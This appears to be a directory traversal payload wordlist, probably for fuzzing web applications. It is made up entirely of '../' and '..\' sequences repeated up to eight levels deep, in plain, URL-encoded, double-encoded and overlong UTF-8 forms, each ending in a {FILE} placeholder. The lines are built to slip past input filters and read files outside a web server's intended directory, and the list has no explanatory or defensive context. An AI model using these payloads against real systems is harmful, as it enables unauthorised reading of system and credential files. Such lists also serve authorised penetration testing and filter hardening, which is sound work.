%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
